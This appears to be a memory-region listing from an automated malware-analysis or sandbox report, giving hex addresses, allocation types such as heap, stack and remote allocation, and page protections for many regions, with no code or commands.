||
|
2130000
|
heap
|
page read and write
|
||
|
47F02FF000
|
stack
|
page read and write
|
||
|
1BF063CD000
|
heap
|
page read and write
|
||
|
2D5C0000
|
direct allocation
|
page execute and read and write
|
||
|
AB0000
|
heap
|
page read and write
|
||
|
7EBA0000
|
direct allocation
|
page read and write
|
||
|
7AA000
|
heap
|
page read and write
|
||
|
4AA000
|
unkown
|
page execute and read and write
|
||
|
7FF7689E2000
|
unkown
|
page readonly
|
||
|
2DDC000
|
stack
|
page read and write
|
||
|
49B97000
|
heap
|
page read and write
|
||
|
151BB510000
|
heap
|
page read and write
|
||
|
49B94000
|
heap
|
page read and write
|
||
|
151BD5D9000
|
trusted library allocation
|
page read and write
|
||
|
611000
|
heap
|
page read and write
|
||
|
9B000
|
stack
|
page read and write
|
||
|
2222000
|
direct allocation
|
page read and write
|
||
|
2A34000
|
direct allocation
|
page read and write
|
||
|
461EA000
|
heap
|
page read and write
|
||
|
7F268000
|
direct allocation
|
page read and write
|
||
|
6A0000
|
heap
|
page read and write
|
||
|
21B52C97000
|
heap
|
page read and write
|
||
|
7FF6DF310000
|
unkown
|
page readonly
|
||
|
1B074610000
|
heap
|
page read and write
|
||
|
B4C31FF000
|
stack
|
page read and write
|
||
|
F74F57F000
|
stack
|
page read and write
|
||
|
3152000
|
heap
|
page read and write
|
||
|
219B90AA000
|
heap
|
page read and write
|
||
|
18B16760000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B91F944000
|
heap
|
page read and write
|
||
|
177000
|
stack
|
page read and write
|
||
|
186B61C5000
|
heap
|
page read and write
|
||
|
7F6BDEF000
|
stack
|
page read and write
|
||
|
2601000
|
heap
|
page read and write
|
||
|
151BB750000
|
trusted library allocation
|
page read and write
|
||
|
2A58000
|
direct allocation
|
page read and write
|
||
|
686000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
129CBAF0000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
151BD5D6000
|
trusted library allocation
|
page read and write
|
||
|
2481D160000
|
heap
|
page read and write
|
||
|
211F000
|
heap
|
page read and write
|
||
|
1B0746FC000
|
heap
|
page read and write
|
||
|
1289B316000
|
heap
|
page read and write
|
||
|
7F1B0000
|
direct allocation
|
page read and write
|
||
|
2D610CE0000
|
heap
|
page read and write
|
||
|
48130000
|
heap
|
page read and write
|
||
|
45D4E000
|
heap
|
page read and write
|
||
|
7FF7689B0000
|
unkown
|
page readonly
|
||
|
594000
|
heap
|
page read and write
|
||
|
2EB77020000
|
heap
|
page read and write
|
||
|
192A7F00000
|
heap
|
page read and write
|
||
|
7FF7689B1000
|
unkown
|
page execute read
|
||
|
33511000
|
direct allocation
|
page execute and read and write
|
||
|
2CC8E000
|
stack
|
page read and write
|
||
|
151BB825000
|
heap
|
page read and write
|
||
|
151BB4F0000
|
heap
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
1CBEAB60000
|
trusted library allocation
|
page read and write
|
||
|
20DC000
|
heap
|
page read and write
|
||
|
46062000
|
heap
|
page read and write
|
||
|
7FF7689B1000
|
unkown
|
page execute read
|
||
|
7FF7689ED000
|
unkown
|
page write copy
|
||
|
4ED000
|
remote allocation
|
page execute and read and write
|
||
|
7FF768A0C000
|
unkown
|
page write copy
|
||
|
19D000
|
stack
|
page read and write
|
||
|
2C5B8000
|
direct allocation
|
page read and write
|
||
|
7EBA0000
|
direct allocation
|
page read and write
|
||
|
62E000
|
heap
|
page read and write
|
||
|
2D51D000
|
heap
|
page read and write
|
||
|
7FF7689E2000
|
unkown
|
page readonly
|
||
|
4A44F000
|
stack
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
6A5000
|
heap
|
page read and write
|
||
|
7FFD9B9B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
6EE000
|
stack
|
page read and write
|
||
|
7FF768A0D000
|
unkown
|
page readonly
|
||
|
7FF7689FF000
|
unkown
|
page read and write
|
||
|
2208000
|
direct allocation
|
page read and write
|
||
|
7FF7689F5000
|
unkown
|
page read and write
|
||
|
7C3000
|
heap
|
page read and write
|
||
|
7FF7689F1000
|
unkown
|
page read and write
|
||
|
9B000
|
stack
|
page read and write
|
||
|
B4C2DEC000
|
stack
|
page read and write
|
||
|
7FF7689ED000
|
unkown
|
page write copy
|
||
|
45D4A000
|
heap
|
page read and write
|
||
|
6BF000
|
stack
|
page read and write
|
||
|
219BAA00000
|
heap
|
page read and write
|
||
|
58E000
|
stack
|
page read and write
|
||
|
291C000
|
direct allocation
|
page execute and read and write
|
||
|
4595F000
|
stack
|
page read and write
|
||
|
45D6F000
|
heap
|
page read and write
|
||
|
7F1FF000
|
direct allocation
|
page read and write
|
||
|
1BF063D0000
|
heap
|
page read and write
|
||
|
186B5F83000
|
heap
|
page read and write
|
||
|
20DC000
|
heap
|
page read and write
|
||
|
2CB3F000
|
stack
|
page read and write
|
||
|
84FB8FD000
|
stack
|
page read and write
|
||
|
7BE000
|
stack
|
page read and write
|
||
|
680000
|
heap
|
page read and write
|
||
|
219BAA83000
|
heap
|
page read and write
|
||
|
332BE000
|
heap
|
page read and write
|
||
|
3A9DEFB000
|
stack
|
page read and write
|
||
|
718000
|
heap
|
page read and write
|
||
|
45DC3000
|
heap
|
page read and write
|
||
|
7EBEF000
|
direct allocation
|
page read and write
|
||
|
7FF7689FF000
|
unkown
|
page read and write
|
||
|
3152000
|
heap
|
page read and write
|
||
|
45BC0000
|
direct allocation
|
page read and write
|
||
|
7FF7689B1000
|
unkown
|
page execute read
|
||
|
650000
|
heap
|
page read and write
|
||
|
24447DE4000
|
heap
|
page read and write
|
||
|
4599E000
|
stack
|
page read and write
|
||
|
8C3000
|
heap
|
page read and write
|
||
|
1AE12C80000
|
heap
|
page read and write
|
||
|
33530000
|
direct allocation
|
page execute and read and write
|
||
|
32FFD000
|
stack
|
page read and write
|
||
|
45BD6000
|
direct allocation
|
page execute and read and write
|
||
|
2105000
|
heap
|
page read and write
|
||
|
7FFD9BB92000
|
trusted library allocation
|
page read and write
|
||
|
21B52C9D000
|
heap
|
page read and write
|
||
|
7FF626C9F000
|
unkown
|
page readonly
|
||
|
45D55000
|
heap
|
page read and write
|
||
|
460DA000
|
heap
|
page read and write
|
||
|
6AC000
|
heap
|
page read and write
|
||
|
20F5000
|
heap
|
page read and write
|
||
|
45D6F000
|
heap
|
page read and write
|
||
|
325AC000
|
stack
|
page read and write
|
||
|
7E9C0000
|
direct allocation
|
page read and write
|
||
|
7FF7689B0000
|
unkown
|
page readonly
|
||
|
2C54D000
|
direct allocation
|
page read and write
|
||
|
7E950000
|
direct allocation
|
page read and write
|
||
|
23C3000
|
direct allocation
|
page read and write
|
||
|
2CC8D000
|
stack
|
page read and write
|
||
|
2156000
|
heap
|
page read and write
|
||
|
8C0000
|
heap
|
page read and write
|
||
|
1AE12C60000
|
heap
|
page read and write
|
||
|
33577000
|
direct allocation
|
page execute and read and write
|
||
|
462000
|
unkown
|
page write copy
|
||
|
2CDF0000
|
heap
|
page read and write
|
||
|
20B699D0000
|
heap
|
page read and write
|
||
|
7C0000
|
heap
|
page read and write
|
||
|
5F6000
|
heap
|
page read and write
|
||
|
339DB000
|
direct allocation
|
page execute and read and write
|
||
|
1B91F910000
|
heap
|
page read and write
|
||
|
21D9619A000
|
heap
|
page read and write
|
||
|
2D611000
|
direct allocation
|
page execute and read and write
|
||
|
47F0738000
|
stack
|
page read and write
|
||
|
3050000
|
heap
|
page read and write
|
||
|
2481D230000
|
heap
|
page read and write
|
||
|
151BD4E3000
|
trusted library allocation
|
page read and write
|
||
|
18B16870000
|
heap
|
page read and write
|
||
|
B42497F000
|
stack
|
page read and write
|
||
|
7F1A0000
|
direct allocation
|
page read and write
|
||
|
226A000
|
direct allocation
|
page read and write
|
||
|
7FF768A0D000
|
unkown
|
page readonly
|
||
|
28567923000
|
heap
|
page read and write
|
||
|
7FF7689B1000
|
unkown
|
page execute read
|
||
|
151BB770000
|
trusted library allocation
|
page read and write
|
||
|
7FF7689FF000
|
unkown
|
page read and write
|
||
|
7FF7689B0000
|
unkown
|
page readonly
|
||
|
7FF768A0C000
|
unkown
|
page write copy
|
||
|
1CBE8E85000
|
heap
|
page read and write
|
||
|
2DAB8000
|
direct allocation
|
page execute and read and write
|
||
|
20E8000
|
heap
|
page read and write
|
||
|
270D000
|
heap
|
page read and write
|
||
|
32ECE000
|
stack
|
page read and write
|
||
|
332B0000
|
heap
|
page read and write
|
||
|
7FF7689F1000
|
unkown
|
page read and write
|
||
|
45DC3000
|
heap
|
page read and write
|
||
|
61E000
|
heap
|
page read and write
|
||
|
47C9A000
|
heap
|
page read and write
|
||
|
66E000
|
stack
|
page read and write
|
||
|
270A000
|
heap
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3310E000
|
stack
|
page read and write
|
||
|
21D960F0000
|
heap
|
page read and write
|
||
|
7FF7689E2000
|
unkown
|
page readonly
|
||
|
2C5B1000
|
direct allocation
|
page read and write
|
||
|
A83000
|
heap
|
page read and write
|
||
|
151D562E000
|
heap
|
page read and write
|
||
|
9E32AFC000
|
stack
|
page read and write
|
||
|
7FF768A0D000
|
unkown
|
page readonly
|
||
|
18B1694B000
|
heap
|
page read and write
|
||
|
499F0000
|
heap
|
page read and write
|
||
|
2390000
|
direct allocation
|
page read and write
|
||
|
210A000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
8CC000
|
heap
|
page read and write
|
||
|
77F000
|
stack
|
page read and write
|
||
|
8D0A9FF000
|
stack
|
page read and write
|
||
|
2125000
|
heap
|
page read and write
|
||
|
1CBE8C26000
|
heap
|
page read and write
|
||
|
20E1000
|
heap
|
page read and write
|
||
|
2D521000
|
heap
|
page read and write
|
||
|
2420DBB0000
|
heap
|
page read and write
|
||
|
7F279000
|
direct allocation
|
page read and write
|
||
|
1F4000
|
heap
|
page read and write
|
||
|
7FF768A09000
|
unkown
|
page readonly
|
||
|
2123000
|
heap
|
page read and write
|
||
|
2593000
|
heap
|
page read and write
|
||
|
45DB0000
|
heap
|
page read and write
|
||
|
7FF768A09000
|
unkown
|
page readonly
|
||
|
20DE000
|
heap
|
page read and write
|
||
|
1BF063BB000
|
heap
|
page read and write
|
||
|
129CBE30000
|
heap
|
page read and write
|
||
|
2420DBB7000
|
heap
|
page read and write
|
||
|
2911000
|
direct allocation
|
page read and write
|
||
|
7FF768A09000
|
unkown
|
page readonly
|
||
|
151D566C000
|
heap
|
page read and write
|
||
|
1D0D0C4B000
|
heap
|
page read and write
|
||
|
129CBA90000
|
heap
|
page read and write
|
||
|
539000
|
unkown
|
page read and write
|
||
|
2112000
|
heap
|
page read and write
|
||
|
67A000
|
heap
|
page read and write
|
||
|
670000
|
heap
|
page read and write
|
||
|
73E000
|
heap
|
page read and write
|
||
|
45D40000
|
heap
|
page read and write
|
||
|
1CBE8D80000
|
heap
|
page read and write
|
||
|
2C578000
|
direct allocation
|
page read and write
|
||
|
20F8000
|
heap
|
page read and write
|
||
|
730000
|
heap
|
page read and write
|
||
|
192A81A0000
|
heap
|
page read and write
|
||
|
20E8000
|
heap
|
page read and write
|
||
|
7FF7689B0000
|
unkown
|
page readonly
|
||
|
2D4AE000
|
heap
|
page read and write
|
||
|
2420DBD4000
|
heap
|
page read and write
|
||
|
2C546000
|
direct allocation
|
page read and write
|
||
|
45D6F000
|
heap
|
page read and write
|
||
|
225C000
|
direct allocation
|
page read and write
|
||
|
1CBE8C2A000
|
heap
|
page read and write
|
||
|
456DF000
|
stack
|
page read and write
|
||
|
20E8000
|
heap
|
page read and write
|
||
|
210A000
|
heap
|
page read and write
|
||
|
7FF7689ED000
|
unkown
|
page read and write
|
||
|
151D55F2000
|
heap
|
page read and write
|
||
|
2D6AA000
|
direct allocation
|
page read and write
|
||
|
53D000
|
unkown
|
page write copy
|
||
|
6A5000
|
heap
|
page read and write
|
||
|
1BF063A6000
|
heap
|
page read and write
|
||
|
20E5000
|
heap
|
page read and write
|
||
|
28567BD0000
|
heap
|
page read and write
|
||
|
7EA5F000
|
direct allocation
|
page read and write
|
||
|
2C8BF000
|
stack
|
page read and write
|
||
|
649000
|
heap
|
page read and write
|
||
|
1B074650000
|
heap
|
page read and write
|
||
|
2D89A000
|
heap
|
page read and write
|
||
|
7FF7689B1000
|
unkown
|
page execute read
|
||
|
2481D180000
|
heap
|
page read and write
|
||
|
2C460000
|
direct allocation
|
page read and write
|
||
|
20B69C80000
|
heap
|
page read and write
|
||
|
7FF7F65C6000
|
unkown
|
page read and write
|
||
|
1CBE8C5B000
|
heap
|
page read and write
|
||
|
21D96010000
|
heap
|
page read and write
|
||
|
7FF7689B1000
|
unkown
|
page execute read
|
||
|
1CBE8C18000
|
heap
|
page read and write
|
||
|
28567BC5000
|
heap
|
page read and write
|
||
|
20B699F2000
|
heap
|
page read and write
|
||
|
151BD5EA000
|
trusted library allocation
|
page read and write
|
||
|
4A70C000
|
stack
|
page read and write
|
||
|
7FF768A0D000
|
unkown
|
page readonly
|
||
|
151BD4B0000
|
heap
|
page execute and read and write
|
||
|
7FF6DF364000
|
unkown
|
page readonly
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
151BB780000
|
heap
|
page readonly
|
||
|
7FF626C91000
|
unkown
|
page execute read
|
||
|
7FF7689ED000
|
unkown
|
page read and write
|
||
|
7FF768A09000
|
unkown
|
page readonly
|
||
|
21D96390000
|
heap
|
page read and write
|
||
|
E08F1D000
|
stack
|
page read and write
|
||
|
7FF7689F1000
|
unkown
|
page read and write
|
||
|
7FF768A04000
|
unkown
|
page read and write
|
||
|
20B69C90000
|
heap
|
page read and write
|
||
|
2709000
|
heap
|
page read and write
|
||
|
7FF7689ED000
|
unkown
|
page write copy
|
||
|
4C40000
|
heap
|
page read and write
|
||
|
7FF7689F9000
|
unkown
|
page read and write
|
||
|
1B0746DD000
|
heap
|
page read and write
|
||
|
2D0AF000
|
stack
|
page read and write
|
||
|
7EBA0000
|
direct allocation
|
page read and write
|
||
|
313E000
|
heap
|
page read and write
|
||
|
45F70000
|
heap
|
page read and write
|
||
|
1F4000
|
heap
|
page read and write
|
||
|
151CD536000
|
trusted library allocation
|
page read and write
|
||
|
2C4F3000
|
direct allocation
|
page read and write
|
||
|
66E000
|
stack
|
page read and write
|
||
|
151D56A4000
|
heap
|
page read and write
|
||
|
2D5A1000
|
direct allocation
|
page execute and read and write
|
||
|
7FF7689E2000
|
unkown
|
page readonly
|
||
|
7FF7689ED000
|
unkown
|
page read and write
|
||
|
54F000
|
unkown
|
page readonly
|
||
|
275D000
|
heap
|
page read and write
|
||
|
7FBA0000
|
direct allocation
|
page read and write
|
||
|
19C000
|
stack
|
page read and write
|
||
|
33191000
|
heap
|
page read and write
|
||
|
4F4000
|
unkown
|
page execute and read and write
|
||
|
20F5000
|
heap
|
page read and write
|
||
|
A30000
|
heap
|
page read and write
|
||
|
1AE12B6A000
|
heap
|
page read and write
|
||
|
151BD4DA000
|
trusted library allocation
|
page read and write
|
||
|
339D4000
|
direct allocation
|
page execute and read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
2460000
|
heap
|
page read and write
|
||
|
2D1AF000
|
stack
|
page read and write
|
||
|
7FF768A09000
|
unkown
|
page readonly
|
||
|
7EFB0000
|
direct allocation
|
page read and write
|
||
|
98F000
|
stack
|
page read and write
|
||
|
21F3000
|
direct allocation
|
page read and write
|
||
|
78F000
|
heap
|
page read and write
|
||
|
47F047E000
|
stack
|
page read and write
|
||
|
7FF7689B0000
|
unkown
|
page readonly
|
||
|
67E000
|
stack
|
page read and write
|
||
|
3120000
|
heap
|
page read and write
|
||
|
20F8000
|
heap
|
page read and write
|
||
|
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7689B1000
|
unkown
|
page execute read
|
||
|
7FF7689FF000
|
unkown
|
page read and write
|
||
|
7FC20000
|
direct allocation
|
page read and write
|
||
|
2600000
|
heap
|
page read and write
|
||
|
7FF7689ED000
|
unkown
|
page write copy
|
||
|
339B1000
|
direct allocation
|
page execute and read and write
|
||
|
270A000
|
heap
|
page read and write
|
||
|
633000
|
heap
|
page read and write
|
||
|
16B63F20000
|
heap
|
page read and write
|
||
|
2933000
|
direct allocation
|
page execute and read and write
|
||
|
70C000
|
heap
|
page read and write
|
||
|
4C50000
|
heap
|
page read and write
|
||
|
2AC3000
|
direct allocation
|
page execute and read and write
|
||
|
20E4000
|
heap
|
page read and write
|
||
|
2C554000
|
direct allocation
|
page read and write
|
||
|
1289B4C0000
|
heap
|
page read and write
|
||
|
7EB00000
|
direct allocation
|
page read and write
|
||
|
271B000
|
heap
|
page read and write
|
||
|
7FF626C9F000
|
unkown
|
page readonly
|
||
|
4D2000
|
remote allocation
|
page execute and read and write
|
||
|
7FF7689E2000
|
unkown
|
page readonly
|
||
|
33534000
|
direct allocation
|
page execute and read and write
|
||
|
1B0746F8000
|
heap
|
page read and write
|
||
|
7FF7689B1000
|
unkown
|
page execute read
|
||
|
7FF768A0D000
|
unkown
|
page readonly
|
||
|
7AB99FF000
|
stack
|
page read and write
|
||
|
20F0000
|
heap
|
page read and write
|
||
|
7FA40000
|
direct allocation
|
page read and write
|
||
|
3117000
|
heap
|
page read and write
|
||
|
1B0746F8000
|
heap
|
page read and write
|
||
|
2116000
|
heap
|
page read and write
|
||
|
2707000
|
heap
|
page read and write
|
||
|
1BF06370000
|
heap
|
page read and write
|
||
|
2C52B000
|
direct allocation
|
page read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
2CF5E000
|
stack
|
page read and write
|
||
|
45DA0000
|
heap
|
page read and write
|
||
|
7EC5A000
|
direct allocation
|
page read and write
|
||
|
7FF768A09000
|
unkown
|
page readonly
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
2D6109C7000
|
heap
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
151D56F0000
|
heap
|
page read and write
|
||
|
7FF7689B1000
|
unkown
|
page execute read
|
||
|
7FF7689ED000
|
unkown
|
page write copy
|
||
|
7FF7689FF000
|
unkown
|
page read and write
|
||
|
2271000
|
direct allocation
|
page read and write
|
||
|
614000
|
heap
|
page read and write
|
||
|
480C0000
|
heap
|
page read and write
|
||
|
21B52DF5000
|
heap
|
page read and write
|
||
|
32ADE000
|
stack
|
page read and write
|
||
|
2A51000
|
direct allocation
|
page read and write
|
||
|
E092FF000
|
stack
|
page read and write
|
||
|
151BD96A000
|
trusted library allocation
|
page read and write
|
||
|
1D0D0EA0000
|
heap
|
page read and write
|
||
|
70D000
|
heap
|
page read and write
|
||
|
273D000
|
heap
|
page read and write
|
||
|
7FF768A09000
|
unkown
|
page readonly
|
||
|
B4C30FF000
|
stack
|
page read and write
|
||
|
1CBE8C5B000
|
heap
|
page read and write
|
||
|
45D39000
|
heap
|
page read and write
|
||
|
2130000
|
heap
|
page read and write
|
||
|
4BA000
|
remote allocation
|
page execute and read and write
|
||
|
7A0000
|
heap
|
page read and write
|
||
|
74A9F6E000
|
stack
|
page read and write
|
||
|
7FF7689F1000
|
unkown
|
page read and write
|
||
|
7EBFF000
|
direct allocation
|
page read and write
|
||
|
7DF42B780000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F1B0000
|
direct allocation
|
page read and write
|
||
|
2D5FB000
|
heap
|
page read and write
|
||
|
215F000
|
heap
|
page read and write
|
||
|
698000
|
heap
|
page read and write
|
||
|
151D562C000
|
heap
|
page read and write
|
||
|
151BD5DD000
|
trusted library allocation
|
page read and write
|
||
|
7EFB0000
|
direct allocation
|
page read and write
|
||
|
8D0AAFE000
|
stack
|
page read and write
|
||
|
416000
|
unkown
|
page readonly
|
||
|
7FF7F65BD000
|
unkown
|
page readonly
|
||
|
33581000
|
direct allocation
|
page execute and read and write
|
||
|
186B6060000
|
heap
|
page read and write
|
||
|
1D0D0C40000
|
heap
|
page read and write
|
||
|
326AA000
|
stack
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
7FF7689B0000
|
unkown
|
page readonly
|
||
|
23BC000
|
stack
|
page read and write
|
||
|
4A6CF000
|
stack
|
page read and write
|
||
|
49D80000
|
heap
|
page read and write
|
||
|
151BD5E3000
|
trusted library allocation
|
page read and write
|
||
|
151D56AC000
|
heap
|
page read and write
|
||
|
2D4CE000
|
heap
|
page read and write
|
||
|
7F260000
|
direct allocation
|
page read and write
|
||
|
8BF000
|
stack
|
page read and write
|
||
|
21E4000
|
direct allocation
|
page read and write
|
||
|
262F000
|
stack
|
page read and write
|
||
|
20F8000
|
heap
|
page read and write
|
||
|
7FF768A09000
|
unkown
|
page readonly
|
||
|
7AF000
|
heap
|
page read and write
|
||
|
7FF768A09000
|
unkown
|
page readonly
|
||
|
84FB9FF000
|
stack
|
page read and write
|
||
|
2C55C000
|
direct allocation
|
page read and write
|
||
|
129CBAFA000
|
heap
|
page read and write
|
||
|
7FF768A09000
|
unkown
|
page readonly
|
||
|
7FF7689E2000
|
unkown
|
page readonly
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
B26000
|
heap
|
page read and write
|
||
|
2D4FC000
|
heap
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
455DC000
|
stack
|
page read and write
|
||
|
20E1000
|
heap
|
page read and write
|
||
|
DA2E7FF000
|
stack
|
page read and write
|
||
|
20EE000
|
heap
|
page read and write
|
||
|
327EF000
|
stack
|
page read and write
|
||
|
20D0000
|
heap
|
page read and write
|
||
|
1CBE8C10000
|
heap
|
page read and write
|
||
|
7FFD9BA96000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CF5E000
|
stack
|
page read and write
|
||
|
7FF7689F1000
|
unkown
|
page read and write
|
||
|
1C50BFF000
|
stack
|
page read and write
|
||
|
2C563000
|
direct allocation
|
page read and write
|
||
|
7E800000
|
direct allocation
|
page read and write
|
||
|
4FB000
|
remote allocation
|
page execute and read and write
|
||
|
47F04FE000
|
stack
|
page read and write
|
||
|
790000
|
heap
|
page read and write
|
||
|
2EB76FA0000
|
heap
|
page read and write
|
||
|
2C578000
|
direct allocation
|
page read and write
|
||
|
23CF000
|
stack
|
page read and write
|
||
|
1F4000
|
heap
|
page read and write
|
||
|
7EBEF000
|
direct allocation
|
page read and write
|
||
|
20DC000
|
heap
|
page read and write
|
||
|
7FF7689E2000
|
unkown
|
page readonly
|
||
|
3282E000
|
stack
|
page read and write
|
||
|
1D0D0E10000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
1B074530000
|
heap
|
page read and write
|
||
|
45E0F000
|
heap
|
page read and write
|
||
|
1289B2F0000
|
heap
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
151BB567000
|
heap
|
page read and write
|
||
|
28E6000
|
direct allocation
|
page read and write
|
||
|
2420DB60000
|
heap
|
page read and write
|
||
|
45DC3000
|
heap
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
1B0746CB000
|
heap
|
page read and write
|
||
|
33544000
|
heap
|
page read and write
|
||
|
7FF7689E2000
|
unkown
|
page readonly
|
||
|
7EA60000
|
direct allocation
|
page read and write
|
||
|
667000
|
heap
|
page read and write
|
||
|
F0D0FAE000
|
stack
|
page read and write
|
||
|
49950000
|
heap
|
page read and write
|
||
|
151BB540000
|
heap
|
page read and write
|
||
|
7F070000
|
direct allocation
|
page read and write
|
||
|
462000
|
unkown
|
page read and write
|
||
|
1CBE8C2A000
|
heap
|
page read and write
|
||
|
2D5CB000
|
direct allocation
|
page execute and read and write
|
||
|
24448035000
|
heap
|
page read and write
|
||
|
193000
|
stack
|
page read and write
|
||
|
311B000
|
heap
|
page read and write
|
||
|
20F6000
|
heap
|
page read and write
|
||
|
28567BC0000
|
heap
|
page read and write
|
||
|
47F083E000
|
stack
|
page read and write
|
||
|
23BC000
|
direct allocation
|
page read and write
|
||
|
151BB820000
|
heap
|
page read and write
|
||
|
219B8FD0000
|
heap
|
page read and write
|
||
|
7F2BF000
|
direct allocation
|
page read and write
|
||
|
4545B000
|
stack
|
page read and write
|
||
|
7FF7689B0000
|
unkown
|
page readonly
|
||
|
9B000
|
stack
|
page read and write
|
||
|
151BD55B000
|
trusted library allocation
|
page read and write
|
||
|
20B699DE000
|
heap
|
page read and write
|
||
|
7FF7689B1000
|
unkown
|
page execute read
|
||
|
4A34E000
|
stack
|
page read and write
|
||
|
7FF7689E2000
|
unkown
|
page readonly
|
||
|
1289B2FA000
|
heap
|
page read and write
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7689ED000
|
unkown
|
page read and write
|
||
|
212F000
|
stack
|
page read and write
|
||
|
239F000
|
stack
|
page read and write
|
||
|
20B69910000
|
heap
|
page read and write
|
||
|
20F4000
|
heap
|
page read and write
|
||
|
7F6BCEB000
|
stack
|
page read and write
|
||
|
620000
|
heap
|
page read and write
|
||
|
1F4000
|
heap
|
page read and write
|
||
|
7FF768A09000
|
unkown
|
page readonly
|
||
|
7CD000
|
heap
|
page read and write
|
||
|
7FF7689E2000
|
unkown
|
page readonly
|
||
|
1D0D0E95000
|
heap
|
page read and write
|
||
|
7FF7689FF000
|
unkown
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
2D351000
|
heap
|
page read and write
|
||
|
7FF7689F9000
|
unkown
|
page read and write
|
||
|
53B000
|
unkown
|
page read and write
|
||
|
32C2E000
|
stack
|
page read and write
|
||
|
2020000
|
heap
|
page read and write
|
||
|
45DBE000
|
heap
|
page read and write
|
||
|
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
|
2278000
|
direct allocation
|
page read and write
|
||
|
192A8190000
|
heap
|
page read and write
|
||
|
46153000
|
heap
|
page read and write
|
||
|
326EE000
|
stack
|
page read and write
|
||
|
7FF7689B1000
|
unkown
|
page execute read
|
||
|
7FF7689B0000
|
unkown
|
page readonly
|
||
|
151BB586000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
7FF7689B1000
|
unkown
|
page execute read
|
||
|
7F200000
|
direct allocation
|
page read and write
|
||
|
7F1FF000
|
direct allocation
|
page read and write
|
||
|
7FF626C9B000
|
unkown
|
page readonly
|
||
|
2145000
|
heap
|
page read and write
|
||
|
63D000
|
heap
|
page read and write
|